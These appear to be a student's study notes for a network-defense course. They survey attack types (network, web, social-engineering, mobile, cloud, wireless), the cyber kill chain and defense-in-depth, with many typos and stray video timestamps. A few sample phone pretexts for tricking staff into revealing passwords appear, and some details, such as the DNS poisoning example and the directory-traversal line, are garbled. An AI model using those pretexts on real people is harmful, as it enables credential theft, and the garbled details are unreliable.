Terminologies related to Network Security Attacks

Asset – interests to an attacker and it can be a tangible or intangible resource of an organization with a monetary value, which an attacker targets, to gain control of it, compromise its security, etc. Example of Assets include Software, Systems, People, Data, Servers

Threat is a potential negative event that can cause damage to an asset. Examples of Threats: An attacker can steal sensitive data of an organization, An attacker can case server to shut down, An attacker can trick employee to reveal sensitive information, An attacker can infect system with malware.

Threat Sources landscape — Natural Fires, Floods, Power Failures, — Unintentional Unskilled administrators, Accidents, Lazy or untrained employees, —- Intentional, Internal Fired employee, disgruntled employee, service providers, contractors, External Hackers, Criminals, Terrorists, Foreign Intelligence agents, Corporate raiders

Threat actor is an individual or group that breaks into the system to achieve specific goal. Types of Threat Actors: Hacktivist – Individuals who promote a political agenda by hacking, especially by defacing or disabling websites. Cyber Terrorist’s – Individuals with a wide range of skills, motivated by religious or political beliefs, to create threats of large-scale disruption of computer networks. Suicide Hackers – Individuals who aim to bring down the critical infrastructure for a “cause” and are not deterred by jail terms or other kinds of punishment State-Sponsored Hackers – Individuals employed by the government to penetrate and gather top-secret information and to damage information systems of other governments. Organized Hackers — Professional hackers who attack a system for profits. Script Kiddies – An unskilled hacker who compromises systems by running scripts, tools, and software developed by actual hackers. Industrial Spies – Individuals who attempt to attack companies for commercial purposes Insider Threat – Threat that originates from people within the organization such as disgruntled employees, terminated employees, and undertrained staff.

Vulnerability – refers to the existence of weakness in an asst that can be exploited by threat agents. Common causes for the existence of vulnerability: Hardware of Software misconfiguration, Insecure or poor design of the network and application, Inherent technology weaknesses, Careless approach of end users.

Examples of network security vulns, TCP/IP protocol vulns – HTTP, FTP, ICMP, SNMP, SMTP are inherently insecure

OS vulns – it is inherently insecure, not patched.

Network devices vulns – various network devices such as routers, firewalls and switches can be vuln due to: Lack of password protections, lack of authentication, insecure routing protocols, firewal vulns

User accounts vulns, originating from the insecure transmission fo user account details such as username and passwords over the network,

System account vulns, origination from setting of weak passwords for system accounts,

Internet service misconfiguration – Misconfiguring internet services can pose serious security risks, For example, enabling JavaScript and misconfiguring IIS, Apache, FTP, and Terminal services, can create security vulnerabilities in the network.

Default password and settings – Leaving the network devices / products with their default passwrods and settings

Network devices misconfiguration – Misconfiguring the network devices

Unwritten Policy – Unwritten security policies are difficult to implement and enforce

Lack of Continuity – Lack of continuity in implementing and enforcing the security policy

Politics – Politics may cause challenges for implementation of a consistent security policy

Lack of awareness – Lack of awareness of the security policy

Risk

Risk refers to the potential loss or damage that can occur when a threat to an asset exists in the presence of a vulnerability that can be exploited.

Risks examples: Disruption or complete shuttin gdown of the business, Loss of privacy, Legal Liability, Loss of productivity, Data loss / theft, Reputation damage and loss of consumer confidence.

Representation of Risk is Risk = Asset + Threat + Vulnerability

An attack is an action initiated for exploiting one of more vulnerabilities to actualize a threat. Attack = Motive (Goal) + Methods (TTPs) + Vulnerability

A motive originates from the notion that the target system stores or processes something valuable, and this leads to a threat of an attack on the system.

Examples of Motives behind Cyber Attacks:

Disrupting business continuity, Information threat, Manupulating data, damaging reputation of the target, Creating fear and chaos by disruptiong critical infrastructures, Financial loss to the target, Propagating religious or political beliefs, Achieving state’s military objectives, Revenge, Demanding ransom

Methods (TTPs)

Attackers attempt to various attack techniques to exploit vulnerablities in a compueter system or security policy and controls to achieve their motives.

The terms Tactics, Techniques, and Procedures (TTPs) refer to the patterns of activities and methds of associated with specific threat actors or groups of threat actors.

Tactics is the defined as the strategy adopted by an attacker to perform the attack from the beginning to the end.

Techniques is defined as technical methods used by an attacker to achieve intermediate results during the attack.

Procedures is defined as a systematic approach adopted by threat actors to launch an attack.

Network-level Security Attacks

The exploitation of the target network begins with reconnaissance

In recon attacks, attackers attempt to discover information about the target network

Attackers can use following techniques to gather network about targets:

Social Engineering

Port Scanning

DNS Footprinting

Ping Sweeping.

Network information obtained using recon attacks:

Domain Name

Internal Domain Names

Network Blocks

Ip Addresses of the Reachable Systems

Rogue Websites / Private Websites

Open Ports

Versions of Running OSes

Running TCP and UDP Services

Access Control Mechanisms and ACLs

Networking Protocols

VPN Points

Running FIrewalls

Analog/Digital Telephone NUmbers

Authentication Mechanisms

System Enumeration

Network Sniffing Attack, sniffing is a process of monitoring and capturing all data packets passing through a given network using sniffing tools. Attackers use various sniffing utilities to sniff network traffic and gather sensitive information.

1. Man-in-the-Middle Attack

In this attack, the intruder deploys a station between the client and server a station between the client and server communication system to intercept messages being exchanged.

Attacker use different techniques to split the TCP connection into two connections. 1. Client to attacker connection. Attacker-to-server connection.

Interception of the TCP connection enables an attacker to read, modify, and insert fraudulent data into th intercepted communication

In the case of an HTTP transaction, the TCP connection between the client and the server is targeted.

2. Password Attack

An attacker attempts to exploit weaknesses to crack passwords

Use of common passwords make a system or application vulnerable to password cracking attacks. The most common passwords used are: password, pa$$w0rd, root, administrator, admin, Test, guest, qwerty, or personal information such as name, birthday, and names of childern.

Attackers use various techniques such as brute-force, social engineering, spoofing, phishing, malware, sniffing, and keylogging to acquire passwords.

Attackers begin by cracking passwords to trick network devices into assuming they are valid users.

3. Privilege Escalation Attack

An attacker can gain access to a network using a non-admin user account, and subsequently gain administrative privileges.

The attacker performs a privilege escalation attack, which exploits design flaws, programming errors, bugs, and configuration oversights in the OS and software application to gain administrative access to the network and its associated applications.

The escalated privileges allow and attacker to view private information, delete files, or install malicious programs such as viruses, trojans, worms, etc.

Types of privilege escalation includes vertical privilege escalation – involves shifting from a user account to an account having higher privileges, Horizontal Privilege Escalation involves shifting from one user account to another user account having the same privileges.

4. DNS Poisoning Attack

Domain Name Server (DNS) poisoning is the unauthorized manipulation of IP addresses in the DNS cache.

The DNS stores domain name translation of IP addresses for network devices

A corrupted DNS redirects a user request to a maliouciou website to perform illegal activities

If a victim types ww.google.co, the request is redirect to the fake website www.google.com 28.21 image

5. ARP Poisoning Attack

Address Resoltion Protocol (ARP) is a protocol used for mapping an IP address to a physical machine address which is recognized in the local network

ARP spoffing/poisoning involves sending a large number of forged entries to the target machines ARP chase. 29.50 image

6. DHCP Starvation Attack

Dynamic Host Configuration Protocol (DHCP) is a configuration protocol that assigns valid IP addresses to host systems out of a pre-assigned DHCP pool.

DHCP starvation attack is a process of inundating DHCP servers with fake DHCP requests and using all the available IP addresses

This results in a denial-of-service attack, where the DHCP server cannot issue new IP addresses to genuine host requests

New clients cannot obtain access to the network, resulting in a DHCP starvation attack

7. DHCP Spoofing Attack

DHCP servers assign IP addresses to client dynamically

An attacker places a rogue DHCP server between the client and the real DHCP server

When a client sends a request, the attacker’s rogue server intercepts the communication and acts as a DHCP server byt replying with fake IP addresses. 32.43 image

DORA – DHCP Discovery from client broadcast, DHCP Offer from server broadcast, DHCP request from client broadcast, DHCP ACK from server.

By installing a rogue DHCP server, the attacker can send incorrect TCP/IP settings such as wrong default gatreway – attacker is the gateway, wrong DNS server, attacker is the DNS server, Wrong IP, DoS with spoofed IP

8. MAC Spoofing Attack

A MAC spoofing attack is launched by sniffing a network for MAC addresses of clients that are actively associated with a switch port, and re-using one of those addresses.

By intercepting the network traffic, the attacker replicates a legitimate user’s MAC address to receive all the traffic intended for the specific user.

This attack enables an attacker to gain access to the network by faking the identity of another person who is already the network.

Attacker sniffs the network for MAC addresses of the currently associated users and then uses one of those MAC addresses to attack other users associated to the same switch port.

9. Network-based Denial-of-Server Attack (DoS)

In network-based DoS attack, attacker sends a large amount of traffic to target network, thereby exhausting the victim’s connection resources.

Attacker does it by exploiting the existing implementation of network protocols.

Examples of OS-specific DoS attacker include:

TCP SYN Flooding, UDP Flodding, ICMP Smurf Flooding, Intermittent Flooding

10. Distributed Denial-of-Server Attack (DDoS)

DDoS attack involves a multide of compromised systems attacking a single target, thereby causing a denial of server for legitmate users.

DDoS attacks disable the entire network and hinder businsess operations causing financial loss and poor reputation.

An attacker uses botnets for exploiting vulnerabilities that exist in the target system and convert it to a bot master. This is used to infect the target with malware, or obtain control of other systems on the network.

2 types of DDoS, Network-centric attack: Overloads a service by consuming bandwidth. Application-centric attack: Overloads a server by inundating it with packets.

11. Malware Attack

Malware are software programs or malicious code that install on a system without the users knowledge.

A malware attack disrupts services, damages systems, gathers sensitive information, etc.

Examples of malware include viruses, trojans, adware, spyware, rootkits, and backdoors.

Virus – A self-replicating program that attaches itself to another program, computer boot sector, or a document.

Spyware – A piece of software code that extracts user information and send it to attackers.

Trojan – A program that appears to be legitimate or useful software but contains hidden and harmful code

Rootkit – A malicious software program that conceals certain activities from detection by the operating systems

Adware – A software program that tracks the users browsing patterns for marketing purposes and to display advertisements

Backdoor – A program that enables attackers to bypass authentication checks such as by gaining administrative privileges without passwords.

12. Advanced Persistent Threats (APTs)

An advanced Persistent Threat (APT) is defined as a type of network attack, in which an attacker gains unauthorized access to a target network and remiain there undetected for a long period of time.

The main objective behind these attacks is to obtain sensitive information rather than sabotaging the organization and organization network.

Information obtained during APT attacks

Classified documents

User credentials

Employee or customers personal information

Network information

Transaction Information

Credit card information

Organization business strategy information

Control system access information

208 days before being detected

Application-level attack techniques

  1. SQL Injection Attack

SQL injection attacks use a serious of malicious SQL queries to directly manipulate a database.

An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data

SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches

This attack is possible only when the application executes dynamic SQL statements and stores procedures with arguments based on the user input.

47.56 image

2. Cross-site Scripting (XSS) Attack

Cross-site scripting (‘XSS’) attack exploit vulnerabilities in dynamically generated web pages, which enable malicious attackers to inject client-side script into web pages viewed by other users.

It occurs when invalidated input data is included in dynamic content that is sent to a user’s web browser for rendering

Attackers injects malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim system by hiding it within legitimate requests.

51.04 image

3. Parameter Tampering Attack

A web parameter tampering attack involves manupulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products.

A parameter tampering attack exploits vulnerablities in integrity and logic validatoin mechanisms that may result in XSS, SQL Injection, etc.

52.19 image

4. Directory Traversal Attack

Directory traversal enables attackers to access restricted directories including application source code, configuration, and critical system files, and execute commands outside the webserver’s root directory.

Access of files located outside the web publishing directory using directory traversal

Attackers can manipulate variables that reference files with “do=dot-slash (,,.)” sequences and its variations

54.14 image

5. Cross-site Request Forgery (CSRF) Attack

Cross-site request forgery (CSRF) attacks exploit web page vulnerabilities that enable an attacker to force an unsuspecting user’s browser to send malicious requests

The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim’s session, compromising its integrity

56.54 image

6. Application-level DoS Attack

Attackers exhaust available server resources by sending hundreds of resource-intensive requests such as retrieving large image files or requesting dynamic pages that require expensive search operations on the backend of database servers

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as the of the legitimate clients, which makes it undetectable by existing DoS protection measures

Targets

CPU, Memory, and Sockets

Disk Bandwidth

Database Bandwidth

Worker Processes

Why are application vulnerable to DoS?

Reasonable User of Expectations

Application Environment Bottlenecks

Implementation Flaws

Poor Data Validation

7. Session Hijacking Attack

Session hijacking refers to an attack where an attacker takes over a valid TCP communication session between two computers

Attackers can sniff all the traffic from the established TCP sessions and perform identity theft, information theft, fraud, etc.

The attacker steals a valid session ID and uses it to authenticate them self with the server

social engineering attack techniques

Social engineer is the art of convincing people to reveal confidential information

Impersonation:

In this social engineering attack, the attacker pretends to be someone legitimate or an authorized person

Attackers may impersonate a legitimate or authorized person either in person or by using a communicaton medium such as phone, email, etc.

Impersonation enables attackers to trick a target into revealing sensitive information

Posing as a legitimate end user – Provide identity and ask for the sensitive information. ” Hi! This is John from finance department. Ihave forgotton my password. Can I get it?”

Posing as an important user – Posing as a VIP of a target company, valuable customer, etc. “Hi! This is Kevin, CFO Secretary. I’m owkring on an urgent prjoect and lost my system’s password. Can you help me out?”

Posing as a technical support – Call as technical support staff and request IDs and passwrods. “Sir, this is Mathew, technical support, X company. Last night we had a system crash here, and we are checking for the lost data. Can ou give me your ID and Password?”

Eavesdropping

Eavesdropping refers to unauthorized listening of conversations, or reading of messages

Interception of audio, video, or written communication

It can be conducted using communication channels such as telephones lines, email, and instant messaging.

Shoulder Surfing

Shoulder surfing uses direct observation techniques such as looking over someone’s shoulder to get information such as passwrods, PINs, and account numbers.

Shoulder surfing can also be conducted from a longer distance with the aid of vision enhancing devices such as binoculars that are quipped with the capability of obtaining long distance information.

Dumpster Diving

Dumpster diving is looking for sensitive information such as phone bills, contact information, financial information, and operations and related information, in someone’s trash

Piggybacking

An authorized person allows (intentionally or unintentionally) an unauthorized person to pass through a secre door.

Tailgating

An unauthorized person, wearing a fake ID badge, enters a secured area by closely following an authorized person through a door requiring key access.

email attack techniques

Malicious Email Attachments

Email attachments are major security threats, as they may deliver malware such as viruses, worms, trojans, rootkits, and spyware to a victim computer when the victim opens them.

Malicious User Redirection

Emails may contain links, which on clicking may redirect the victim to websites hosting malware

Phishing

The attacker sends an email asking victim for personal / financial information along with a link similar to a genuine website

If victim clicks the link, enters details, and then click on “Submit” the information is sent to the attacker.

Spamming

Spam refers to unsolicited commercial advertisements distributed online. Spam often contains fake, unreliable, and worthless content.

Although email remains the most common way of sending spam, it can also be found in online message boards and chat rooms.

Spam continues to exist due to people who respond to them.

mobile device-specific attack techniques

Rooting and Jailbreaking

Rooting in Android Phones – rooting enables Android users to attain privileged control known as root access within androids subsystem. Rooting involves exploiting security vulnerabilities in the device firmware, and copying the su binary to a location in the current processes PATH (e.g. /system/xbin/su) and granting it executable permissions with the chmod command.

Jail breaking in iOS Phones – Jailbreaking is defined as the process of installing a modified set of kernel patches that enables users to run third-party application snot signed by the OS vendor. Jailbreaking provides root access to the operating system and permits downloading of third-party applications, themes, and extensions on iOS devices.

Uploading Malicious Apps in App Store

Insufficient or no vetting of apps leads to malicious and fake apps entering app marketplace

App stores are common targets for attackers to distribute malware and malicious apps

Attackers can social engineer users to download and run apps outside the official app stores

Malicious apps can damage other application and data, and send sensitive data to attackers

Mobile Spamming

Unsolicited text/email messages sent to mobile devices from known/unknown phone numbers/email IDs.

Spam message contain advertisements or malicious links that can trick users into revealing confidential information

Significant amount of bandwidth is wasted by spam messages

Spam attacks are conducted for financial gain

SMS Phishing Attack (SMSiShing)

SMS Phishing is the act of attempting to acquire personal and financial information by sending SMS (or IM) containing a deceptive link.

Why is SMS Phishing Effective?

Most users access the Internet through a mobile device

Easy to set up a mobile phishing campaign

Difficult to detect and stop before they cause harm

Mobile users are not accustomed to receiving spam text messages on their mobile

No mainstream mechanism for weeding out spam SMS

Most mobile anti-virus applications do not check the SMS

Bluebugging Attack

Mobile device pairing on open connections (public Wi-fi/unencrypted Wi-fi ) enables attackers to eavesdrop and intercept data transmission using techniques such as:

Bluesnarfing (Stealing information via Bluetooth)

Bluebugging (Gaining control over the device via Bluetooth)

Sharing data from malicious devices can infect/breach data on the recipient device

1.14.47 image

cloud specific attack techniques

  1. Data breach/loss
  2. Abuse and nefarious use of cloud services
  3. Insecure interfaces and APIs
  4. Insufficient due diligence
  5. Shared technology issues
  6. unknown risk profile
  7. Unsynchronized system clocks
  8. Inadequate infrastructure design and planning
  9. Conflicts between client hardening procedures and cloud environment
  10. Loss of operational and security logs
  11. Malicious insiders
  12. Illegal access to cloud systems
  13. Loss of business reputation due to co-tenant activities
  14. Privilege escalation
  15. Natural disasters
  16. Hardware failure
  17. Supply chain failure
  18. Modifying network traffic
  19. Isolation failure
  20. Cloud provider acquisition
  21. Management interface compromised
  22. Network management failure
  23. Authentication attacks
  24. VM-level attacks
  25. Lock-in
  26. Licensing risks
  27. Loss of governance
  28. Loss of encryption keys
  29. Risks from changes of jurisdiction
  30. undertaking malicious problems or scans
  31. Theft of computer equipment
  32. Cloud service termination or failure
  33. Subpoena and e-discovery
  34. Improper data handling and disposal
  35. Loss or modification of backup data
  36. Compliance risks
  37. Economic denial of sustainability (EDOS)
  38. Lack of security architecture
  39. Hijacking accounts

OWASP top 10 Cloud Security Risks

R1 – Accountability and Data Ownership – Using public cloud for hosting business services can cause severe risk for the recoverability of data

R2 – User Identity – Creating multiple user identities for different cloud providers makes it complex to manage multiple user IDs and credentials

R3 – Regulatory Compliance – Lack of transparency, and different regulatory laws in different countries

R4 – Business Continuity and Resiliency – Risk or monetary loss if the cloud provider handles business continuity improperly

R5 – User Privacy and Secondary Usage of Data – The default share feature in social websites can jeopardize the privacy of a users personal data

R6 – Service and Data integration – Unsecure data in transit is susceptible to eavesdropping and interception attacks

R7 – Multi Tenancy and Physical Security – Inadequate logical segregation may lead to tenants interfering with the security features of each other

R8 – Incidence Analysis and Forensic Support – Due to the distributed storage of logs across the cloud, law enforcing agencies may face challenges in forensics recovery

R9 – Infrastructure Security – Misconfiguration of infrastructure may allow network scanning for vulnerable applications and services

R10 – Non-Production Environment Exposure – Using non-production environments increases the risk of unauthorize access, information disclosure, and information modification.

wireless network attack techniques

War Driving – Attackers drive around with Wifi enabled laptops to detect open wireless networks

Client Misassociation – An attacker sets up a rogue access point outside the corporate perimeter and tricks employees to connect to it

Unauthorized Association – Attackers infect a victim machine and activate APs to provide them with an unauthorized connection to the enterprise network

Honeypot Access Point Attack – An attacker traps people by using fake APs

Rogue Access Point Attack – Rogue wireless access points placed in a 801.11 network can be used to hijack the connections of legitimate network users

Misconfigured Access Point Attack – Misconfigure access points enable intruders to steal the SSID giving them access to the network

Ad Hoc Connection Attack – Wi-Fi clients communicate directly via an ad hoc mode that does not require an AP to relay packets

AP MAC Spoofing – A hacker spoofs the MAC address of a WLAN client’s equipment to act as an authorized client and connects to the AP as the client and eavesdrop on the traffic.

Denial-of-Service Attacks – Wireless DoS attacks disrupt network wireless connection by sending broadcast “de-authenticate” commands

WPA-PSK Cracking – Attackers sniff and capture authentication packets and run a brute force attack to crack the WPA-PSK key

RADIUS Replay – Attackers replay the valid RADIUS server response and successfully authenticate to the client without valid credentials

MAC Spoofing Attack – An attacker spoofs the MAC of a client and attempts to authenticate to the AP, which leas to the updating of the MAC address info in the network routers and switches

WEP Cracking – Attackers sniff and capture packets and run a WEP cracking program to obtain the WEP key

Man-in-the-middle Attack – Attackers deploy a rogue AP, and spoofs the client’s MAC address to position themselves between the real AP and the Client to listen to the traffic.

Fragmentation Attack – Attackers obtain 1500 bytes of a pseudo random generation algorithm (PRGA) to generate forged WEP packets that are in turn used for various injection attacks.

Jamming Signal Attack – An attacker stakes out the area from a nearby location with a high gain amplifier, downing out the legitimate access point.

hacking methodologies and frameworks

Reconnaissance

Scanning

Gaining Access

Maintaining Access

Clearing Tracks

Lockheed Martins Cyber kill chain here

Recon – Gather data on the target to probe for weak points

Weaponization – Create a deliverable malicious payload using an exploit and a backdoor

Delivery – Send a weaponized bundle to the victim using email, USB, etc.

Exploitations – Exploit a vulnerability by executing code on the victim system

Installation – Install a malware on the target system

Command and Control – Create a command control channel to communicate and pass data back and forth

Actions and Objectives – perform actions to achieve intended objectives and goals

MITRE Attack Framework

attack.mitre.org

Understanding the tactics and techniques adopted by attackers is key to success

The ultimate goal of network defense is to protect an organizations information, systems, and network infrastructure from unauthorized access, misuse, modification, services denial, or any degradation and disruptions

Organizations rely on Information Assurance (IA) principles to attain defense-in-depth security

Information Assurance (IA) principles act as enablers for an organization’s security activities to protect and defend the organizational network from security attacks.

Confidentiality – Ensures information is not disclosed to unauthorized parties

Integrity = Ensures information is not modified or tampered with by unauthorized parties

Availability – Ensures information is available to authorized parties without any disruptions

Non-repudiation – Ensures that a party a communication cannot deny sending the message

Authentication – Ensures the identity of an individual is verified by the system or service.

Network Defense Benefits

Protect information assets

Comply with government and industry specifics regulations

Ensure secure communcation with clients and suppliers

Reduced the risk of being attacked

Gain competitive edge over competitors by providing more secure services.

Challenges

Distributed Competing Environments: With the advancement in modern technology and to meet business requirements, network are becoming vast and complex, potentially leading to serious security vulnerabilities. Attackers exploit exposed security vulnerabilities to compromised network security.

Emerging Threats: Potential threats to the network evolve each day. Network security attacks are becoming technically more sophisticated and better organized.

Lack of Network Security Skills: Organization are failing to defend themselves against rapidly increasing network attacks due to the lack of network security skills.

Explain Continual / Adaptive Security strategy

Computer network defense involves applying a set of rules, configurations, processes, and measure to protect the integrity, confidentiality and availability of the network’s information systems and resources.

Network security approaches, Preventive approaches – consist of methods or techniques that are used to avoid threats or attacks on the target network

Reactive approaches – consist of methods or techniques that are used to detect attacks on the target network

Retrospective Approaches – Consist of methods or techniques that examine the causes for attacks, and contain, remediate, eradicate, and recover from damage caused by the attack on the target network.

Proactive Approaches- Consist of methods or techniques that are used to make informed decisions on potential attacks in the future on the target network

Protect – This includes a set of prior countermeasure taken towards eliminating all the possible vulnerabilities of the network Protect endpoints, protect networks, protect data

Detect – This involves continuous monitoring of the network and identifying abnormalities and their origins. Continuous threat monitoring

Respond – This involves a set of actions taken to contain, eradicate, mitigate, and recover from the impact of attacks on the network. Incident Response

Predict – This involves identifying most likely attacks, target, and methods prior to materialization of a potential attack, Risks and Vuln assessment, attack surface analysis, threat intelligence

Administrative Security Control

The management implements administrative controls to ensure the safety of the organization

Regulatory framework Compliance

Employee Monitoring and Supervising

Security Policy

Informatoin Classificatoin

Security Awareness and Training

Physical Security

This is a set of security measures taken to prevent unauthorized access to physical devices

Fences

Locks

Badge System

Security guard

Biometrics system

Mantrap doors

Lighting

Motion detectors

Closed-circuit TVs

Alarms

Technical Security Controls

This is a set of security measures taken to protect data and systems from unauthorized personnel

Access Controls

Authenticatoin

Authorization

Auditing

Security Protocols

Network Security Devices

Technology, Operations and People

Appropriate selection of technology, well-defined operations, and skilled people are required for effective implementation of security strategies.

Technology

Selecting appropriate technology is crucial, as improper selection of technology can provide a flase sense of security.

Example questionnaire for facilitating appropriate selection of technology:

Which of Firewalls, IDS, antivirus, etc.., are required for the network?

Which type of encryption algorithm should b used?

Is a centralized or a distributed access mechanism more suitable for the network?

What type of password complexity should be adopted?

Should critical servers be placed on a separate segment?

Operations

Technological implementations are by themselves not sufficient, they should be supported by well-defined operations

Example of perations:

Creating and enforcing security policies

Creating and enforcing standard network operations procedures

Planning business continuity

Configuration control Managemnt

Creating and implementing incident response processes

Planning disaster recovery

Providing security awareness training

enforcing security as culture

People

Appropriate technology and well-defined operations cannot replace skilled people, who are required to implement the technology and managed well-defined operations.

Blue Team:

The people who are collectively responsible for developing effective network defense are generally part of the blue team.

The blue team is responsible for determining the overall adequacy of security measures. They examine the current security status and any security deficiencies existing in the network, and propose effective security measures to defend the network from various types of attacks.

Blue team includes network defenders such as network administrator, network security administrator / engineer, security analysts, network technicians, end users, and people involved in network security operations.

Multi layered Security – Defense-in-Depth

Data is utmost important and is at core for any organizations

Policies related to Internet access, acceptable-use, user-account, firewall, email security, passwords, physical security, BYOD. Compliance related to standards such as ISO/IEC 27001, PCI-DSS, HIPAA, etc.- Policies, Procedures, and Awareness

Physical locks, access controls ,security personnel, fire fighting systems, power supply, video surveillance, lighting, alarm, systems, etc.. – Physical

Servers, DNS, routers, firewalls, switches – Perimeter

Routers, servers, switches, firewalls – Internal Network

OS, antiviruses, patch management, passwords management, logging, etc.. – Host

Backlisting, whitelisting, patch management, password management, application configuration, firewalls, etc.. – Applications

Encryption, hashing, data access controls, data leakage prevention, data backup, data recovery, data retention, data disposal, etc. – Data

Organization should adopt defense-depth security strategy for effective protection of their information systems and resources

1.49.57 image

Summary

A threat is an act in which an adversary attempts to gain unauthorized access to an organization’s network by exploiting communcation paths

Intent, capability, and opportunity invariably exist behind the presence of a threat

Attackers follow various attack methodologies for the successful execution of an attack

Computer network defense includes a set of processes and protective measures adopted to defend the network against service or network denial, degradation, and disruption.

Blue team is collectively responsible for developing effective network defense

Organization must adopt continual security improvement and defense-in-depth security strategies for effective protection of their information systems and resources,